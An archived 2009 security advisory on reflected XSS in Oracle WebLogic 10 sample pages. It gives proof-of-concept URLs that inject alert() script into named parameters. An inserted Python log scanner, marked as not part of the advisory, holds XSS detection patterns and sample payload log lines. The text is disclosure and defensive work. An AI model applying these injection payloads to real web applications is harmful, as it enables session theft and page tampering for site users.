


From: Alexandr Polyakov <alexandr.polyakov_(at)_dsec.ru>
Date: 16 January 2009
Subject: Digital Security Research Group [DSecRG] Advisory #DSECRG-09-002


Digital Security Research Group [DSecRG] Advisory       #DSECRG-09-002


Application:                    Oracle BEA Weblogic 10
Versions Affected:              Oracle BEA Weblogic 10  
Vendor URL:                     http://oracle.com
Bugs:                           Multiple XSS Vulnerabilities in samples
Exploits:                       YES
Reported:                       16.07.2008
Vendor response:                18.07.2008
Last response:                  30.10.2008
Description:                    reviewService sample of WebLogic Server.        
Date of Public Advisory:        13.01.2009  
Authors:                        Alexandr Polyakov
                               Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)


Description
***********


Multiple XSS vulnerabilities were found in the Oracle BEA WebLogic Server samples,
version 10.2 and the latest release.



Details
*******

Vulnerabilities found in reviewService sample of Weblogic Server.

1. Linked XSS found in the createArtist_service.jsp page. Vulnerable parameter "name".


Example
*******
http://testserver.com:7001/reviewService/createArtist_service.jsp?name=<script>alert('DSECRG')</script>


2. Linked XSS found in addBooks_session_ejb21.jsp. Vulnerable parameter "title"


Example
*******
http://testserver.com:7001/reviewService/addBooks_session_ejb21.jsp?name=111&title=<script>alert('DSECRG')</script>



3. Linked XSS found in addBooks_session_ejb21.jsp. Vulnerable parameter "rating"

Example
*******
http://testserver.com:7001/reviewService/addReview_service.jsp?comment=111&rating=<script>alert('DSECRG')</script>

4. Linked XSS found in addBooks_session_ejb21.jsp. Vulnerable parameter "rating"

Example
*******
http://testserver.com:7001/reviewService/addReview_session.jsp?comment=111&rating=<script>alert('DSECRG')</script>

5. There are also a couple of XSS vulnerabilities in POST parameters of the following scripts:


http://testserver.com:7001/reviewService/examplesWebApp/JWS_WebService.jsp
http://testserver.com:7001/reviewService/ClientServlet
http://testserver.com:7001/reviewService/InterceptorClientServlet
http://testserver.com:7001/reviewService/createArtist_service.jsp
http://testserver.com:7001/reviewService/createArtist_session.jsp
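As an added defender-side example that is not part of the advisory, the following Python scans WebLogic access-log lines for probes against the sample pages and parameters listed in items 1-4, percent-decoding repeatedly so that double-encoded input is not missed. The common-log-format pattern and the sample log lines are constructed assumptions of this example.

```python
"""Flag reflected-XSS probes against the WebLogic reviewService sample pages in access-log lines. Constructed example."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit
# Pages and parameters named in items 1-4 of the advisory.
SAMPLE_PARAMS = {
    "/reviewService/createArtist_service.jsp": {"name"},
    "/reviewService/addBooks_session_ejb21.jsp": {"title"},
    "/reviewService/addReview_service.jsp": {"rating"},
    "/reviewService/addReview_session.jsp": {"rating"},
}
# Markup that has no place in a free-text or numeric form parameter.
MARKUP = re.compile(r"<\s*/?\s*script|javascript\s*:|\bon\w+\s*=", re.IGNORECASE)
# Common log format (WebLogic's access.log default); the request line is the
# quoted field. The pattern is an assumption of this example.
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')
def decode_fully(value, rounds=3):
    # Percent-decode repeatedly so double-encoded payloads are not missed.
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line):
    # Return a finding for a probe against a watched sample page, else None.
    m = LOG_LINE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    watched = SAMPLE_PARAMS.get(url.path)
    if watched is None:
        return None
    for key, raw in parse_qsl(url.query, keep_blank_values=True):
        if key in watched and MARKUP.search(decode_fully(raw)):
            return {"client": m["client"], "page": url.path,
                    "param": key, "status": int(m["status"])}
    return None
def scan(lines):
    # One finding per matching line, in log order.
    return [f for f in map(inspect_line, lines) if f]

# Constructed log lines: an encoded probe, a double-encoded probe, a benign
# request to a sample page, and a request outside the sample application.
SAMPLE_LOG = [
    '10.0.0.5 - - [16/Jan/2009:10:12:01 +0300] "GET /reviewService/createArtist_service.jsp?name=%3Cscript%3Ealert(%27DSECRG%27)%3C/script%3E HTTP/1.1" 200 1532',
    '10.0.0.5 - - [16/Jan/2009:10:12:09 +0300] "GET /reviewService/addReview_session.jsp?comment=111&rating=%253Cscript%253Ealert(1)%253C/script%253E HTTP/1.1" 200 1410',
    '10.0.0.9 - - [16/Jan/2009:10:13:44 +0300] "GET /reviewService/addBooks_session_ejb21.jsp?name=111&title=Dune HTTP/1.1" 200 1290',
    '10.0.0.9 - - [16/Jan/2009:10:14:02 +0300] "GET /index.jsp HTTP/1.1" 200 7761',
]
```

Sample applications such as reviewService are not meant for production hosts, so on such a host any request to these paths is worth reviewing regardless of payload.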

Fix Information
***************

This is a Security-In-Depth issue, because it was found in samples (see
http://www.oracle.com/technology/deploy/security/cpu/cpufaq.htm). Oracle uses
that term for vulnerability issues that result in significant modification of
Oracle code or documentation in future releases, but are not of such a critical
nature that they are distributed in Critical Patch Updates.


http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html



Credits
*******
Oracle credited Alexander Polyakov of Digital Security in the Security-In-Depth
program of the January 2009 CPU.

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html



About
*****

Digital Security is a leading IT security company in Russia, providing information
security consulting, audit and penetration testing services, risk analysis and
ISMS-related services, and certification for the ISO/IEC 27001:2005 and PCI DSS
standards. Digital Security Research Group focuses on web application and
database security problems, with vulnerability reports, advisories and whitepapers
posted regularly on our website.


Contact:        research [at] dsec [dot] ru
               http://www.dsecrg.ru
               http://www.dsec.ru





© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod